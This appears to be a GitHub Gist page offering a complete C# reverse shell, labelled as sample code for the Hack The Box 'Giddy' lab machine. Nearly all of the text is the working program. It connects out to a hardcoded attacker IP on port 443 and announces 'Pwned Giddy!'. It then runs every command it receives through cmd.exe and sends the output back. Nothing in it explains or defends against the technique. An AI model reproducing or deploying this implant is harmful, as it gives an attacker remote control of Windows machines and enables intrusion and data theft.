Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Sample reverse shell code for HTB Giddy.
using System;
using System.Text;
using System.IO;
using System.Net;
using System.Net.Sockets;
using System.Diagnostics;
class Server {
public static void Main(String[] args) {
Socket s = null;
String server = "10.10.12.75";
byte[] res = new byte[1024];
byte[] msg = Encoding.UTF8.GetBytes("Pwned Giddy!\n");
IPAddress me = IPAddress.Parse(server);
IPEndPoint i = new IPEndPoint(me, 443); // Our IP and Port
s = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
s.Connect(i);
if(s.Connected) {
s.Send(msg, 0, msg.Length, SocketFlags.None);
}
while(true) {
Array.Clear(res, 0, res.Length);
s.Receive(res, 0, s.Available, SocketFlags.None);
String cmd = (Encoding.UTF8.GetString(res)).Trim();
cmd = cmd.Replace("\r", string.Empty);
cmd = cmd.Replace("\n", string.Empty);
if(!string.IsNullOrEmpty(cmd)) {
byte[] output = Encoding.UTF8.GetBytes(getOutput(cmd));
s.Send(output, 0, output.Length, SocketFlags.None);
}
}
}
public static String getOutput(String cmd) {
var psi = new ProcessStartInfo {
FileName = "cmd.exe",
Arguments = "/c " + cmd,
RedirectStandardOutput = true,
RedirectStandardError = true,
UseShellExecute = false
};
Console.WriteLine(psi.Arguments.Trim());
var p = Process.Start(psi);
String res = p.StandardOutput.ReadToEnd();
res += p.StandardError.ReadToEnd();
p.WaitForExit();
return res;
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.